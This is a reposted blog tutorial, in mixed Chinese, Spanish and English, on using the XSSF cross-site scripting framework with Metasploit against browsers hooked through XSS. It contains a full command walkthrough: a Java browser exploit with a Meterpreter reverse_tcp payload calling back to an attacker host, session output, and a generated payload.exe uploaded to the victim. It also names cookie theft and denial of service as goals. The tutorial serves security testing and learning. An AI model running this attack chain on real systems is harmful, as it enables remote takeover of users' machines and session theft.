2019独角兽企业重金招聘Python工程师标准>>>

跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集。 该项目是为了验证网站存在的XSS漏洞及是被如何利用的。

XSSF允许同目标浏览器(一个存在XSS漏洞的)创建通信通道来实施攻击。用户可以免费选择已经存在的攻击模块来对目标浏览器实施攻击。

(英文太差,懒得翻译了,转成英文后大伙应该都能看懂。)
        Xssf Framework allows you to manage victims of XSS attacks and generic persists victims a connection with them through a "loop" in javascript, which is responsible for sending requests reverse at defined intervals of time in order to execute exploits against the victim.

To use xssf in metasploit is necessary to locate a vulnerable application to XSS attacks, to test and improve skills in the field of web application security, there is a project called DVWA (Damn Vulnerable Web Application) is an application written in PHP MySQL and has enabled a number of vulnerabilities that allows a security professional, interact with the application and understanding of possible attacks that can be done in web applications.

XSSF documented provides a powerful API, which facilitates the development of modules and attacks. In addition, their integration into the Metasploit Framework allows users to start the MSF browser based exploit easilly XSS vulnerability.

Exploiting a XSS bug in the victim's browser could be to browse website on attacker's browser, using the victim's session connected. In most cases, simply stealing the victim cookie will be sufficient to do this.

However, in a few cases (intranet, network tools portals, etc.), the cookie will not be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

With XSS we can create a tunnel that will allow us to connect our victim from a web browser, the basic idea was to create a tunnel to serve as a proxy for communication between the application XSS vulnerability exploited and the attacker passed between the victim, in this way you can run some additional attack without revealing the identity of the attacker and using the identity of the victim.

The new version 4.6.0-dev MSF is supported by:

  • Backtrack 5R3

  • Ubuntu 12.04

  • Kali 1.0

  • Windows 7

Vulnerabilidades XSS (Cross Site Scripting )

  • Cross Site Scripting InDirecto (Reflejado) Reflective XSS

  • Cross Site Scripting  Directo (Persistente)

Manual con ejemplos "XSS for fun and profit"

It allows:

stealing Cookies

Execute commands (via Javascript)

Execute attacks Denial of Service (DDoS)

XSSF con Metasploit

msfupdate cd /opt/metasploit/apps/pro/msf3 svn export http:/xssf.googlecode.com/svn/trunk ./ --force msfconsole
msf > load xssf Port=80
msf > help xssf

Result of the available commands:

  • xssf_active_victims Muestra víctimas activas.

  • xssf_add_auto_attack Añade un nuevo ataque automatizado (lanzado de forma automática en la conexión de la víctima).

  • xssf_auto_attacks Muestra XSSF ataques automatizados.

  • xssf_banner Prints Marco XSS bandera !

  • xssf_clean_victims Limpia víctimas en la base de datos ( eliminar ataques de espera).

  • xssf_exploit Lanza e introduce un módulo (que se ejecuta en uno de sus procesos ) en una víctima determinada.

  • xssf_information Muestra información sobre una víctima determinada.

  • xssf_log Muestra registro con un ID dado.

  • xssf_logs Muestra los registros sobre una víctima determinada.

  • xssf_remove_auto_attack Elimina un ataque automatizado.

  • xssf_remove_victims Elimina las víctimas en la base de datos.

  • xssf_restore_state Restaura el estado XSSF (víctimas , registros , etc) a partir del archivo de entrada.

  • xssf_save_state Guarda estatales XSSF (víctimas , registros , etc) en el archivo de salida.

  • xssf_servers Muestra todos los servidores de ataque utilizados.

  • xssf_tunnel Nos proporciona un túnel entre agresor y víctima.

  • xssf_urls Enumera las direcciones URL's disponibles útiles proporcionadas por XSSF.

  • xssf_victims Muestra todas las víctimas

Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

xssf_victims

1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

[..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]

    use exploit/multi/browser/java_atomicreferencearray    set PAYLOAD java/meterpreter/reverse_tcpset SRVHOST 192.168.23.200set URIPATH xssfset LHOST 192.168.23.200exploit -jjobs

Jobs
        ====
        Id Name
        – —-
        0 Exploit: multi/browser/java_atomicreferencearray

    xssf_exploit 1 0

[*] Searching Metasploit launched module with JobID = ’0′…
        [+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ’1′
        [+] Remaining victims to attack: NONE

    show sessions

Active sessions
        ===============
        Id Type Information Connection
        – —- ———– ———-
        1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
use exploit/multi/handler
exploit -j
upload /opt/metasploit/apps/pro/msf3/payload.exe c
background
sessions -i 1

PS:写文章不易呀,翻译也挺苦逼,虽然是翻译成英文,真心敬仰那些翻译大神!

via:Elhacker

转载于:https://my.oschina.net/u/1188877/blog/282206

XSSF - Cross Site Scripting Framework相关推荐

  1. 【常见Web应用安全问题】---1、Cross Site Scripting

    Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些.  常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...

  2. XSS(Cross Site Scripting)攻击简介

    环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...

  3. Reflected Cross Site Scripting (XSS)

    前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),  攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...

  4. Xss-reflected/stored跨站脚本分析(Cross site scripting)

    Xss-reflected/stored跨站脚本分析(Cross site scripting) 基础知识 针对Dom - dochtml Url概念:协议+网址/dns+端口+路径 XSS原理:对U ...

  5. DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)

    DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...

  6. Cross Site Scripting DOM攻击jQuery append() 的处理方法

    做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...

  7. CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击

    CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...

  8. 跨站脚本攻击(Cross‐Site Scripting (XSS))实践

    作者发现博客园在首页显示摘要时未做html标签的过滤,致使摘要中的html代码可以被执行,从而可以注入任何想要被执行的js代码,作者利用这一缺陷在本文摘要中插入了一段js代码执行alert弹窗,同时增 ...

  9. DVWA-Reflected Cross Site Scripting (XSS)

    实验环境: DVWA靶机:172.16.12.10 靶场用户名:admin 密码:123 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 反射型Xss ...

最新文章

  1. Django 模型成员2.2
  2. 开发者怎么样做到盈利
  3. Win32 API 浏览目录对话框示例
  4. 没有足够多的数据怎么办?计算机视觉数据增强方法总结
  5. Django 之 Cookie判断是否已登陆(写成类)
  6. CentOS最小化安装后AR8151网卡驱动未安装解决办法
  7. Javascript 链式运动框架——逐行分析代码,让你轻松了解运动的原理
  8. 5.1 vim介绍 5.2 vim颜色显示和移动光标 5.3 vim一般模式下移动光标 5.4 vim一般模式下复制、剪切和粘贴...
  9. U盘病毒“替身”大量交叉感染 打印店电脑助扩散
  10. fiddler手机模拟器抓包_fiddler抓包+雷电模拟器 完成手机app抓包的配置
  11. 小米4Linux刷机包,小米4官方原厂固件rom线刷刷机包下载_小米4线刷官方系统包
  12. vep视频转换为mp4文件
  13. 保镖机器人作文_【保镖的作文】_玛雅作文网
  14. 罗格斯的计算机科学博士奖学金,罗格斯大学计算机工程博士专业排名全网最新深刻分析...
  15. SQL函数---SQL UCASE()
  16. 联想台式计算机HDMI使用,联想电脑怎样连接电视
  17. 电脑神器推荐 地表最强播放器 (文末附下载资源)
  18. 内置方法及模块初识,set的hash算法面试题
  19. Bootstrap从入门到实战---点击提示和悬停提示
  20. 计算机网络——学习笔记

热门文章

  1. On release of batch it still contained JDBC statements
  2. 除智联招聘,还有哪些靠谱的招聘软件呢?
  3. 虚拟带库(VTL)备份恢复解决方案
  4. 最新酷睿计算机配置,笔记本电脑什么配置好?来看最新Intel11代酷睿cpu
  5. java解析JT808协议
  6. win开启审计功能_windows文件共享审计功能开启
  7. 微信朋友圈点赞测试点【杭州多测师】【杭州多测师_王sir】
  8. [Qt] TCP客户端与服务器断开连接自动重联机制
  9. php 元旦祝福,元旦祝福语
  10. React 版本的真开箱即用的富文本编辑器wysiwyg